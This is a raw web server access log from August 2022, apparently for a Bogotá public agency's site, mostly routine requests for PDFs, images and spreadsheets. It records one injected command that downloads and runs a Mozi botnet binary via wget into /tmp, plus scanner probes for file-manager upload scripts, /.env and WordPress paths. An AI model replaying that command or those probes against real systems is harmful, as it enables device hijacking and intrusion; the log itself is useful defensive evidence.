181.58.182.91 - - [28/Aug/2022:15:04:04 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.css HTTP/1.1" 200 2066
181.58.182.91 - - [28/Aug/2022:15:04:04 -0500] "GET /galeria/carrusel/Carrusel/jquery-ui-1.8.13.custom.min.js HTTP/1.1" 200 10800
181.58.182.91 - - [28/Aug/2022:15:04:04 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.js HTTP/1.1" 200 8157
181.58.182.91 - - [28/Aug/2022:15:04:04 -0500] "GET /galeria/nivo-slider/demo/banner.html HTTP/1.1" 200 5446
181.58.182.91 - - [28/Aug/2022:15:04:04 -0500] "GET /galeria/nivo-slider/themes/default/default.css HTTP/1.1" 200 1569
181.58.182.91 - - [28/Aug/2022:15:04:04 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
181.58.182.91 - - [28/Aug/2022:15:04:04 -0500] "GET /galeria/nivo-slider/themes/orman/orman.css HTTP/1.1" 200 2152
181.58.182.91 - - [28/Aug/2022:15:04:04 -0500] "GET /galeria/nivo-slider/nivo-slider.css HTTP/1.1" 200 1507
181.58.182.91 - - [28/Aug/2022:15:04:04 -0500] "GET /galeria/nivo-slider/jquery.nivo.slider.pack.js HTTP/1.1" 200 11561
181.58.182.91 - - [28/Aug/2022:15:04:04 -0500] "GET /galeria/nivo-slider/demo/style.css HTTP/1.1" 200 2222
181.58.182.91 - - [28/Aug/2022:15:04:04 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
181.58.182.91 - - [28/Aug/2022:15:04:04 -0500] "GET /galeria/nivo-slider/demo/images/bannertortuga_optimized.jpg HTTP/1.1" 200 39066
181.58.182.91 - - [28/Aug/2022:15:04:04 -0500] "GET /galeria/nivo-slider/demo/images/Bannermujeresquereverdecen.jpg HTTP/1.1" 200 46558
181.58.182.91 - - [28/Aug/2022:15:04:04 -0500] "GET /galeria/nivo-slider/demo/images/Bannersedeelectronica.jpg HTTP/1.1" 200 40383
181.58.182.91 - - [28/Aug/2022:15:04:04 -0500] "GET /galeria/nivo-slider/demo/images/bannerrutaesperanza.jpg HTTP/1.1" 200 55560
181.58.182.91 - - [28/Aug/2022:15:04:04 -0500] "GET /galeria/nivo-slider/demo/images/bannertrafico_optimized.jpg HTTP/1.1" 200 42578
181.58.182.91 - - [28/Aug/2022:15:04:04 -0500] "GET /galeria/nivo-slider/demo/images/banneraire2021.jpg HTTP/1.1" 200 265101
181.58.182.91 - - [28/Aug/2022:15:04:04 -0500] "GET /galeria/nivo-slider/themes/default/loading.gif HTTP/1.1" 200 1737
181.58.182.91 - - [28/Aug/2022:15:04:04 -0500] "GET /galeria/nivo-slider/demo/images/4Simple_Slider.png HTTP/1.1" 200 11722
181.58.182.91 - - [28/Aug/2022:15:04:04 -0500] "GET /galeria/nivo-slider/demo/images/Bannerplasticosseptiembre.jpg HTTP/1.1" 200 45633
181.58.182.91 - - [28/Aug/2022:15:04:04 -0500] "GET /galeria/nivo-slider/demo/images/bannerresiduoshospitalariosagosto.jpg HTTP/1.1" 200 36499
181.58.182.91 - - [28/Aug/2022:15:04:04 -0500] "GET /galeria/nivo-slider/demo/images/banneraccionpopularcrr68.jpg HTTP/1.1" 200 51887
181.58.182.91 - - [28/Aug/2022:15:04:04 -0500] "GET /galeria/nivo-slider/demo/images/banneraccionpopular.jpeg HTTP/1.1" 200 41707
181.58.182.91 - - [28/Aug/2022:15:04:04 -0500] "GET /galeria/nivo-slider/demo/images/bannerclases2021.jpg HTTP/1.1" 200 68230
181.58.182.91 - - [28/Aug/2022:15:04:05 -0500] "GET /galeria/nivo-slider/demo/images/bannercapacitacionesbogota.jpg HTTP/1.1" 200 42416
181.58.182.91 - - [28/Aug/2022:15:04:05 -0500] "GET /galeria/nivo-slider/demo/images/Bannerenvases.jpg HTTP/1.1" 200 37316
181.58.182.91 - - [28/Aug/2022:15:04:05 -0500] "GET /galeria/nivo-slider/demo/images/Bannervirtualescanales.jpg HTTP/1.1" 200 174544
181.58.182.91 - - [28/Aug/2022:15:04:05 -0500] "GET /galeria/nivo-slider/themes/default/arrows.png HTTP/1.1" 200 824
181.58.182.91 - - [28/Aug/2022:15:04:05 -0500] "GET /galeria/nivo-slider/themes/default/bullets.png HTTP/1.1" 200 1281
181.243.96.127 - - [28/Aug/2022:15:05:12 -0500] "-" 408 -
172.22.2.4 - - [28/Aug/2022:15:03:39 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 53631
87.250.224.25 - - [28/Aug/2022:15:06:23 -0500] "-" 408 -
201.245.192.253 - - [28/Aug/2022:15:06:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [28/Aug/2022:15:06:46 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.16 - - [28/Aug/2022:15:07:13 -0500] "GET /BLA/resoluciones/AUTOS%202022/3409.pdf HTTP/1.1" 200 1959933
219.155.5.187 - - [28/Aug/2022:15:07:28 -0500] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 946
20.244.21.62 - - [28/Aug/2022:15:07:43 -0500] "HEAD / HTTP/1.1" 200 -
20.244.21.62 - - [28/Aug/2022:15:07:46 -0500] "GET / HTTP/1.1" 200 319
20.244.21.62 - - [28/Aug/2022:15:07:50 -0500] "GET /kcfinder/upload.php HTTP/1.1" 404 1049
20.244.21.62 - - [28/Aug/2022:15:07:51 -0500] "GET /asset/kcfinder/upload.php HTTP/1.1" 404 1049
20.244.21.62 - - [28/Aug/2022:15:07:53 -0500] "GET /assets/kcfinder/upload.php HTTP/1.1" 404 1049
20.244.21.62 - - [28/Aug/2022:15:07:55 -0500] "GET /js/kcfinder/upload.php HTTP/1.1" 404 1049
20.244.21.62 - - [28/Aug/2022:15:07:57 -0500] "GET /assets/js/kcfinder/upload.php HTTP/1.1" 404 1049
20.244.21.62 - - [28/Aug/2022:15:07:58 -0500] "GET /assets/plugins/kcfinder/upload.php HTTP/1.1" 404 1049
20.244.21.62 - - [28/Aug/2022:15:08:01 -0500] "GET /plugins/kcfinder/upload.php HTTP/1.1" 404 1049
20.244.21.62 - - [28/Aug/2022:15:08:04 -0500] "GET /filemanager/dialog.php HTTP/1.1" 404 1049
20.244.21.62 - - [28/Aug/2022:15:08:06 -0500] "GET /assets/filemanager/dialog.php HTTP/1.1" 404 1049
172.22.2.4 - - [28/Aug/2022:15:06:28 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
20.244.21.62 - - [28/Aug/2022:15:08:08 -0500] "GET /assets/plugins/filemanager/dialog.php HTTP/1.1" 404 1049
20.244.21.62 - - [28/Aug/2022:15:08:09 -0500] "GET /phpformbuilder/plugins/filemanager/dialog.php HTTP/1.1" 404 1049
20.244.21.62 - - [28/Aug/2022:15:08:11 -0500] "GET /assets/tinymce/plugins/filemanager/dialog.php HTTP/1.1" 404 1049
20.244.21.62 - - [28/Aug/2022:15:08:13 -0500] "GET /scripts/filemanager/dialog.php HTTP/1.1" 404 1049
20.244.21.62 - - [28/Aug/2022:15:08:16 -0500] "GET /admin/filemanager/dialog.php HTTP/1.1" 404 1049
20.244.21.62 - - [28/Aug/2022:15:08:18 -0500] "GET /assets/plugins/elfinder/elfinder.html HTTP/1.1" 404 1049
20.244.21.62 - - [28/Aug/2022:15:08:20 -0500] "GET /assets/elfinder/elfinder.html HTTP/1.1" 404 1049
20.244.21.62 - - [28/Aug/2022:15:08:22 -0500] "GET /assets/scripts/filemanager/dialog.php HTTP/1.1" 404 1049
20.244.21.62 - - [28/Aug/2022:15:08:25 -0500] "GET /assets/admin/tinymce/plugins/filemanager/dialog.php HTTP/1.1" 404 1049
20.244.21.62 - - [28/Aug/2022:15:08:26 -0500] "GET /js/tinymce4/plugins/filemanager/dialog.php HTTP/1.1" 404 1049
20.244.21.62 - - [28/Aug/2022:15:08:28 -0500] "GET /tinymce/filemanager/dialog.php HTTP/1.1" 404 1049
20.244.21.62 - - [28/Aug/2022:15:08:31 -0500] "GET /filemanager/filemanager/dialog.php HTTP/1.1" 404 1049
20.244.21.62 - - [28/Aug/2022:15:08:32 -0500] "GET /assets/admin/js/tinymce/plugins/filemanager/dialog.php HTTP/1.1" 404 1049
20.244.21.62 - - [28/Aug/2022:15:08:34 -0500] "GET /tinymce/plugins/filemanager/dialog.php HTTP/1.1" 404 1049
20.244.21.62 - - [28/Aug/2022:15:08:36 -0500] "GET /.env HTTP/1.1" 404 1049
20.244.21.62 - - [28/Aug/2022:15:08:37 -0500] "GET /wp HTTP/1.1" 404 1049
20.244.21.62 - - [28/Aug/2022:15:08:39 -0500] "GET /wordpress HTTP/1.1" 404 1049
20.244.21.62 - - [28/Aug/2022:15:08:41 -0500] "GET /blog HTTP/1.1" 404 1049
20.244.21.62 - - [28/Aug/2022:15:08:43 -0500] "GET /demo HTTP/1.1" 404 1049
20.244.21.62 - - [28/Aug/2022:15:08:45 -0500] "GET /new HTTP/1.1" 404 1049
172.22.2.4 - - [28/Aug/2022:15:07:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56367
191.95.60.62 - - [28/Aug/2022:15:09:49 -0500] "GET /Publicaciones/SSFFS-05815.zip HTTP/1.1" 200 10904942
201.245.192.253 - - [28/Aug/2022:15:11:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [28/Aug/2022:15:11:46 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.186 - - [28/Aug/2022:15:13:40 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2021%2F HTTP/1.1" 200 393164
172.22.2.4 - - [28/Aug/2022:15:12:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/Aug/2022:15:13:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
213.180.203.74 - - [28/Aug/2022:15:16:23 -0500] "-" 408 -
201.245.192.253 - - [28/Aug/2022:15:16:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [28/Aug/2022:15:16:47 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.36 - - [28/Aug/2022:15:17:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/2971.pdf HTTP/1.1" 304 -
157.55.39.8 - - [28/Aug/2022:15:18:35 -0500] "GET /bla/resoluciones/resoluciones%202019/2973.pdf HTTP/1.1" 200 295363
201.245.192.253 - - [28/Aug/2022:15:19:18 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43104
201.245.192.253 - - [28/Aug/2022:15:19:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38699
172.22.2.4 - - [28/Aug/2022:15:18:08 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
191.95.60.62 - - [28/Aug/2022:15:18:55 -0500] "GET /Publicaciones/SSFFS-05817.zip HTTP/1.1" 200 9367093
5.45.207.134 - - [28/Aug/2022:15:20:15 -0500] "-" 408 -
5.45.207.68 - - [28/Aug/2022:15:20:20 -0500] "-" 408 -
87.250.224.115 - - [28/Aug/2022:15:20:26 -0500] "-" 408 -
5.45.207.108 - - [28/Aug/2022:15:20:31 -0500] "-" 408 -
172.22.2.4 - - [28/Aug/2022:15:18:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60865
95.108.213.61 - - [28/Aug/2022:15:20:46 -0500] "-" 408 -
95.108.213.13 - - [28/Aug/2022:15:21:01 -0500] "-" 408 -
201.245.192.253 - - [28/Aug/2022:15:21:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
95.108.213.2 - - [28/Aug/2022:15:21:31 -0500] "-" 408 -
216.245.221.92 - - [28/Aug/2022:15:21:46 -0500] "HEAD / HTTP/1.1" 200 -
5.255.253.178 - - [28/Aug/2022:15:22:31 -0500] "-" 408 -
87.250.224.130 - - [28/Aug/2022:15:23:31 -0500] "-" 408 -
87.250.224.139 - - [28/Aug/2022:15:25:32 -0500] "-" 408 -
172.22.2.4 - - [28/Aug/2022:15:23:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
191.95.60.62 - - [28/Aug/2022:15:23:11 -0500] "GET /Publicaciones/SSFFS-05819.zip HTTP/1.1" 200 20538828
201.245.192.253 - - [28/Aug/2022:15:26:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [28/Aug/2022:15:24:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52868
216.245.221.92 - - [28/Aug/2022:15:26:47 -0500] "HEAD / HTTP/1.1" 200 -
186.155.18.170 - - [28/Aug/2022:15:27:16 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110281
186.155.18.170 - - [28/Aug/2022:15:27:17 -0500] "GET /portaldeninos/wp-content/uploads/2022/08/HUmedalConejera03-1.jpg HTTP/1.1" 200 12388495
186.155.18.170 - - [28/Aug/2022:15:27:21 -0500] "GET /portaldeninos/wp-content/uploads/2019/06/CabezoteAMBIENTIC.mp4 HTTP/1.1" 206 21677757
186.155.18.170 - - [28/Aug/2022:15:27:36 -0500] "GET /portaldeninos/tipos-de-arboles-en-bogota/ HTTP/1.1" 200 109802
186.155.18.170 - - [28/Aug/2022:15:27:36 -0500] "GET /portaldeninos/wp-content/plugins/smart-slider-3/nextend/media/dist/n2.min.js?1528383544 HTTP/1.1" 200 3495
186.155.18.170 - - [28/Aug/2022:15:27:36 -0500] "GET /portaldeninos/wp-content/plugins/smart-slider-3/library/media/smartslider.min.css?1558968666 HTTP/1.1" 200 19594
186.155.18.170 - - [28/Aug/2022:15:27:36 -0500] "GET /portaldeninos/wp-content/plugins/smart-slider-3/library/media/plugins/type/simple/simple/dist/smartslider-simple-type-frontend.min.js?1563274780 HTTP/1.1" 200 18726
186.155.18.170 - - [28/Aug/2022:15:27:36 -0500] "GET /portaldeninos/wp-content/plugins/smart-slider-3/nextend/media/dist/nextend-frontend.min.js?1563274780 HTTP/1.1" 200 76980
186.155.18.170 - - [28/Aug/2022:15:27:36 -0500] "GET /portaldeninos/wp-content/plugins/smart-slider-3/library/media/dist/smartslider-frontend.min.js?1563274780 HTTP/1.1" 200 128256
186.155.18.170 - - [28/Aug/2022:15:27:36 -0500] "GET /portaldeninos/wp-content/uploads/2021/07/Banners-pa%CC%81gina-de-nin%CC%83os9.jpg HTTP/1.1" 200 31924
186.155.18.170 - - [28/Aug/2022:15:27:36 -0500] "GET /portaldeninos/wp-content/uploads/2019/09/Categorias-%C3%A1rboles.jpg HTTP/1.1" 200 275407
186.155.18.170 - - [28/Aug/2022:15:27:36 -0500] "GET /portaldeninos/wp-content/uploads/2019/09/Palma-F%C3%A9nix-%C3%A1rboles.jpg HTTP/1.1" 200 312005
186.155.18.170 - - [28/Aug/2022:15:27:36 -0500] "GET /portaldeninos/wp-content/uploads/2019/09/Roble-%C3%A1rboles.jpg HTTP/1.1" 200 416546
186.155.18.170 - - [28/Aug/2022:15:27:37 -0500] "GET /portaldeninos/wp-content/uploads/2019/09/Magnolio-%C3%A1rboles.jpg HTTP/1.1" 200 252375
186.155.18.170 - - [28/Aug/2022:15:27:36 -0500] "GET /portaldeninos/wp-content/uploads/2019/09/PalmaDeCera-%C3%A1rboles.jpg HTTP/1.1" 200 265651
186.155.18.170 - - [28/Aug/2022:15:27:37 -0500] "GET /portaldeninos/wp-content/uploads/2019/09/Sangregado-%C3%A1rboles.jpg HTTP/1.1" 200 302240
186.155.18.170 - - [28/Aug/2022:15:27:36 -0500] "GET /portaldeninos/wp-content/uploads/2019/09/Introducci%C3%B3n-%C3%A1rboles.jpg HTTP/1.1" 200 264318
186.155.18.170 - - [28/Aug/2022:15:27:37 -0500] "GET /portaldeninos/wp-content/uploads/2019/09/Nogal-%C3%A1rboles.jpg HTTP/1.1" 200 378405
186.155.18.170 - - [28/Aug/2022:15:27:37 -0500] "GET /portaldeninos/wp-content/uploads/2019/09/Pino-Romer%C3%B3n-%C3%A1rboles.jpg HTTP/1.1" 200 414717
186.155.18.170 - - [28/Aug/2022:15:27:37 -0500] "GET /portaldeninos/wp-content/uploads/2019/09/Caucho-sabanero-%C3%A1rboles.jpg HTTP/1.1" 200 344651
186.155.18.170 - - [28/Aug/2022:15:27:37 -0500] "GET /portaldeninos/wp-content/uploads/2019/09/Cedro-%C3%A1rboles.jpg HTTP/1.1" 200 264883
186.155.18.170 - - [28/Aug/2022:15:27:37 -0500] "GET /portaldeninos/wp-content/uploads/2019/09/Cipr%C3%A9s-%C3%A1rboles.jpg HTTP/1.1" 200 485766
190.27.59.39 - - [28/Aug/2022:15:27:44 -0500] "GET /BLA/resoluciones/AUTOS%202015/0445.pdf HTTP/1.1" 200 704175
190.27.59.39 - - [28/Aug/2022:15:27:45 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
172.22.2.4 - - [28/Aug/2022:15:28:05 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
5.255.253.166 - - [28/Aug/2022:15:28:32 -0500] "-" 408 -
201.245.192.253 - - [28/Aug/2022:15:29:18 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43104
201.245.192.253 - - [28/Aug/2022:15:29:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38699
157.55.39.80 - - [28/Aug/2022:15:30:00 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
157.55.39.8 - - [28/Aug/2022:15:30:15 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
207.46.13.115 - - [28/Aug/2022:15:30:20 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
201.245.192.253 - - [28/Aug/2022:15:31:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [28/Aug/2022:15:29:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [28/Aug/2022:15:31:46 -0500] "HEAD / HTTP/1.1" 200 -
64.124.8.57 - - [28/Aug/2022:15:31:58 -0500] "GET /transparencia/financiera/Ejecucion%20Presupuestal/Vigencia%20actual HTTP/1.1" 301 298
172.22.2.4 - - [28/Aug/2022:15:30:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58566
17.121.114.121 - - [28/Aug/2022:15:33:02 -0500] "-" 408 -
191.95.60.62 - - [28/Aug/2022:15:33:02 -0500] "GET /Publicaciones/SSFFS-05822.zip HTTP/1.1" 200 2023825
87.250.224.184 - - [28/Aug/2022:15:33:31 -0500] "-" 408 -
64.124.8.57 - - [28/Aug/2022:15:34:11 -0500] "GET /transparencia/financiera/Ejecucion%20Presupuestal/Vigencia%20actual/6%20Ejecucion%20de%20Vigencia%20Junio%202022.xlsx HTTP/1.1" 200 127377
64.124.8.57 - - [28/Aug/2022:15:35:48 -0500] "GET /transparencia/financiera/Ejecucion%20Presupuestal/Vigencia%20actual/3.%20EJECUCION%20DE%20VIGENCIAS%20MARZO%202022.xlsx HTTP/1.1" 200 114111
201.245.192.253 - - [28/Aug/2022:15:36:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
191.95.60.62 - - [28/Aug/2022:15:35:28 -0500] "GET /Publicaciones/SSFFS-05824.zip HTTP/1.1" 200 20535801
216.245.221.92 - - [28/Aug/2022:15:36:47 -0500] "HEAD / HTTP/1.1" 200 -
64.124.8.57 - - [28/Aug/2022:15:37:03 -0500] "GET /transparencia/financiera/Ejecucion%20Presupuestal/Vigencia%20actual/6%20Ejecucion%20de%20Reservas%20Junio%202022.xlsx HTTP/1.1" 200 27985
172.22.2.4 - - [28/Aug/2022:15:37:12 -0500] "GET /BLA/boletinlegal/Directivas/2016/Directiva%20No.%2004%20del%2023%20de%20Diciembre%20de%202016.pdf HTTP/1.1" 304 -
172.22.2.4 - - [28/Aug/2022:15:35:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/Aug/2022:15:38:00 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/analisis%20C-595-2010.doc HTTP/1.1" 200 39424
172.22.2.4 - - [28/Aug/2022:15:36:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55621
207.46.13.115 - - [28/Aug/2022:15:39:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202003/RES%202003%20851-900/871.tif HTTP/1.1" 200 74904
201.245.192.253 - - [28/Aug/2022:15:39:18 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43104
201.245.192.253 - - [28/Aug/2022:15:39:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38699
172.22.2.4 - - [28/Aug/2022:15:39:54 -0500] "GET /BLA/boletinlegal/Directivas/2009/Directiva%20No.%20del%2023%20de%20Diciembre%20de%202009.pdf HTTP/1.1" 304 -
64.124.8.57 - - [28/Aug/2022:15:40:00 -0500] "GET /transparencia/financiera/Ejecucion%20Presupuestal/Historico/EJECUCION%20RESERVAS%20DICIEMBRE%202017.xlsx HTTP/1.1" 200 19578
191.95.60.62 - - [28/Aug/2022:15:39:30 -0500] "GET /Publicaciones/SSFFS-05823.zip HTTP/1.1" 200 14418864
172.22.2.4 - - [28/Aug/2022:15:39:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 63198
201.245.192.253 - - [28/Aug/2022:15:41:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
5.255.253.189 - - [28/Aug/2022:15:41:31 -0500] "-" 408 -
216.245.221.92 - - [28/Aug/2022:15:41:46 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/Aug/2022:15:41:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/Aug/2022:15:43:15 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
172.22.2.4 - - [28/Aug/2022:15:43:16 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
172.22.2.4 - - [28/Aug/2022:15:43:25 -0500] "GET /BLA/boletinlegal/Circulares/2022/CIRCULAR%20No.%2000005%20DEL%2030%20DE%20JUNIO%20DEL%202022.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [28/Aug/2022:15:43:30 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [28/Aug/2022:15:43:40 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2010%20del%2026%20de%20Enero%20de%202012.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [28/Aug/2022:15:42:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
192.30.241.125 - - [28/Aug/2022:15:43:51 -0500] "GET / HTTP/1.1" 200 319
192.30.241.125 - - [28/Aug/2022:15:44:07 -0500] "GET / HTTP/1.1" 200 319
192.30.241.125 - - [28/Aug/2022:15:44:22 -0500] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 404 1018
192.30.241.125 - - [28/Aug/2022:15:44:38 -0500] "GET /xmlrpc.php?rsd HTTP/1.1" 404 1018
191.95.60.62 - - [28/Aug/2022:15:45:00 -0500] "GET /Publicaciones/SSFFS-05826.zip HTTP/1.1" 200 727736
185.119.81.109 - - [28/Aug/2022:15:45:06 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.109 - - [28/Aug/2022:15:45:07 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
192.30.241.125 - - [28/Aug/2022:15:44:54 -0500] "GET / HTTP/1.1" 200 319
192.30.241.125 - - [28/Aug/2022:15:45:10 -0500] "GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1018
192.30.241.125 - - [28/Aug/2022:15:45:25 -0500] "GET /web/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1018
172.22.2.4 - - [28/Aug/2022:15:45:54 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 402730
172.22.2.4 - - [28/Aug/2022:15:45:54 -0500] "GET /BLA/boletinlegal/images/background.gif HTTP/1.1" 200 -
192.30.241.125 - - [28/Aug/2022:15:45:41 -0500] "GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1018
192.30.241.125 - - [28/Aug/2022:15:45:57 -0500] "GET /website/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1018
201.245.192.253 - - [28/Aug/2022:15:46:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
192.30.241.125 - - [28/Aug/2022:15:46:13 -0500] "GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1018
172.22.2.4 - - [28/Aug/2022:15:46:40 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=COMPETENCIA&fecha=2022&resuelve= HTTP/1.1" 200 35281
192.30.241.125 - - [28/Aug/2022:15:46:29 -0500] "GET /news/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1018
216.245.221.92 - - [28/Aug/2022:15:46:46 -0500] "HEAD / HTTP/1.1" 200 -
181.59.2.115 - - [28/Aug/2022:15:46:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1992.pdf HTTP/1.1" 200 328492
192.30.241.125 - - [28/Aug/2022:15:46:44 -0500] "GET /2018/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1018
192.30.241.125 - - [28/Aug/2022:15:47:00 -0500] "GET /2019/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1018
192.30.241.125 - - [28/Aug/2022:15:47:16 -0500] "GET /shop/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1018
172.22.2.4 - - [28/Aug/2022:15:47:42 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20ANALISIS%20SENTENCIA%20T-411%20DE%201992.doc HTTP/1.1" 200 41984
192.30.241.125 - - [28/Aug/2022:15:47:32 -0500] "GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1018
192.30.241.125 - - [28/Aug/2022:15:47:47 -0500] "GET /test/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1018
192.30.241.125 - - [28/Aug/2022:15:48:03 -0500] "GET /media/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1018
192.30.241.125 - - [28/Aug/2022:15:48:19 -0500] "GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1018
64.124.8.57 - - [28/Aug/2022:15:48:49 -0500] "GET /transparencia/financiera/Ejecucion%20Presupuestal HTTP/1.1" 301 280
192.30.241.125 - - [28/Aug/2022:15:48:35 -0500] "GET /site/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1018
190.24.101.1 - - [28/Aug/2022:15:48:51 -0500] "GET /forest/ HTTP/1.1" 200 12041
172.22.2.4 - - [28/Aug/2022:15:47:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
190.24.101.1 - - [28/Aug/2022:15:48:59 -0500] "POST /forest/index.php HTTP/1.1" 200 12268
192.30.241.125 - - [28/Aug/2022:15:48:50 -0500] "GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1018
64.124.8.57 - - [28/Aug/2022:15:49:17 -0500] "GET /transparencia/financiera/Ejecucion%20Presupuestal/Vigencia%20actual/5%20EJECUCION%20DE%20RESERVAS%20MAYO%202022.xlsx HTTP/1.1" 200 28238
192.30.241.125 - - [28/Aug/2022:15:49:06 -0500] "GET /sito/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1018
172.22.2.4 - - [28/Aug/2022:15:48:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54347
181.59.2.115 - - [28/Aug/2022:15:49:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2559.pdf HTTP/1.1" 200 311274
201.245.192.253 - - [28/Aug/2022:15:51:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
64.124.8.57 - - [28/Aug/2022:15:51:23 -0500] "GET /transparencia/financiera/Ejecucion%20Presupuestal/Vigencia%20actual/2.%20EJECUCION%20DE%20RESERVAS%20FEBRERO%202022.xlsx HTTP/1.1" 200 28955
5.45.207.102 - - [28/Aug/2022:15:51:31 -0500] "-" 408 -
216.245.221.92 - - [28/Aug/2022:15:51:46 -0500] "HEAD / HTTP/1.1" 200 -
64.124.8.57 - - [28/Aug/2022:15:52:14 -0500] "GET /transparencia/financiera/Ejecucion%20Presupuestal/Vigencia%20actual/7%20Ejecucion%20de%20Vigencia%20julio%202022.xlsx HTTP/1.1" 200 134431
191.95.60.62 - - [28/Aug/2022:15:52:18 -0500] "GET /Publicaciones/SSFFS-05827.zip HTTP/1.1" 200 19773130
64.124.8.57 - - [28/Aug/2022:15:53:13 -0500] "GET /transparencia/financiera/Ejecucion%20Presupuestal/Vigencia%20actual/3.%20EJECUCION%20DE%20RESERVAS%20MARZO%202022.xlsx HTTP/1.1" 200 29026
64.124.8.57 - - [28/Aug/2022:15:54:23 -0500] "GET /transparencia/financiera/Ejecucion%20Presupuestal/Vigencia%20actual/7%20Ejecucion%20de%20Reservas%20julio%202022.xlsx HTTP/1.1" 200 27661
172.22.2.4 - - [28/Aug/2022:15:53:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
